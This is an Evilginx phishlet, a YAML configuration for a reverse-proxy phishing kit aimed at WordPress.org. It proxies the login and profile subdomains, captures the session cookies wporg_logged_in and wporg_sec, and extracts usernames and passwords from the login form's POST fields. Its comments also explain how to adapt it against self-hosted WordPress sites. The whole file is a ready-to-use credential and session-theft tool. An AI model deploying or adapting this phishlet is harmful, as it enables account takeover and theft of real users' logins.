# Evilginx phishlet configuration file for WordPress.org.
#
# This is a phishing configuration for the main WordPress.org domain,
# it is *not* immediately useful for phishing self-hosted sites that
# run on the WordPress software.
#
# For such self-hosted sites, some modifications are needed. Refer to
# the comments in this file for some guidance on creating a phishlet
# to use against self-hosted WordPress sites.
---
name: 'WordPress.org'
author: '@meitar'
min_ver: '2.3.0'

proxy_hosts:
    # Proxy the primary domain.
    - phish_sub: ''
      orig_sub: ''
      domain: 'wordpress.org' 
      session: true
      is_landing: true

    # These proxied should be removed when phishing self-hosted sites.
    - phish_sub: 'login'
      orig_sub: 'login'
      domain: 'wordpress.org'
      session: true
      is_landing: false
    - phish_sub: 'make'
      orig_sub: 'make'
      domain: 'wordpress.org'
      session: true
      is_landing: false
    - phish_sub: 'profiles'
      orig_sub: 'profiles'
      domain: 'wordpress.org'
      session: true
      is_landing: false

sub_filters: []

# For self-hosted WordPress sites, you may find it easier to use a
# regular expression to match session cookies, as the cookie names
# are produced unqiely per-site. This can be done as follows:
#
# ```yaml
# - domain: 'self-hosted-domain.com'
#   keys:
#       - 'wordpress_sec_.*,regexp'
#       - 'wordpress_logged_in_.*,regexp'
# ```
#
# If you do choose to use the regular expression facility, you
# will also then need to use the `auth_urls` dictionary to define
# when Evilginx should actually capture these tokens. Something
# like this should do the trick:
#
# ```yaml
# auth_urls:
#     - '.*/wp-admin/.*'
# ```
#
# The above ensures that the `auth_tokens` are noticed whenever
# the phished user makes requests to URLs containing `wp-admin`.
#
# For the WordPress.org service itself, however, none of the above is
# necessary, and the following simple `auth_tokens` dictionary should
# work just fine.
auth_tokens:
    - domain: '.wordpress.org'
      keys: ['wporg_logged_in', 'wporg_sec']

credentials:
    username:
        key: 'log'
        search: '(.*)'
        type: 'post'
    password:
        key: 'pwd'
        search: '(.*)'
        type: 'post'

# For a self-hosted WordPress site, you'll probably want to define the
# `login` dictionary here as follows:
#
# ```yaml
# login:
#     domain: 'self-hosted-domain.com'
#     path: '/wp-login.php'
# ```
#
# Some WordPress plugins, such as WooCommerce, change the URL of the
# login page. You'll want to examine the specific site for this.
login:
    domain: 'login.wordpress.org'
    path: '/'